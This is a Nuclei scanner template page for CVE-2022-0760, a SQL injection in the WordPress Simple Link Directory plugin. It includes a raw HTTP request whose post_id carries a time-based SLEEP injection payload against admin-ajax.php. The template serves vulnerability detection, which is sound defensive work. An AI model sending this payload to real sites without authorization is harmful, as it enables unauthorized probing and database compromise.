Skip to content
Nuclei Templates

WordPress Simple Link Directory <7.7.2 - SQL injection

ID: CVE-2022-0760

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud

Description

Section titled “Description”

WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0760


info:
  name: WordPress Simple Link Directory <7.7.2 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
  remediation: |
    Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210
    - https://wordpress.org/plugins/simple-link-directory/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0760
    - https://plugins.trac.wordpress.org/changeset/2684915
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0760
    cwe-id: CWE-89
    epss-score: 0.02788
    epss-percentile: 0.89602
    cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: quantumcloud
    product: simple_link_directory
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud


http:
  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)


    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200 || status_code == 500'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "vote_status") || contains(body, "critical error")'
        condition: and
# digest: 4b0a00483046022100ef2ae601a859a101200769a2a461be82b4bac3f147011233d2dc942d409817b4022100d5ebe41b4ab6cfd874e45c04d0054d2b3c447a420978181b353cbe10a54d8753:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0760.yaml"

View on Github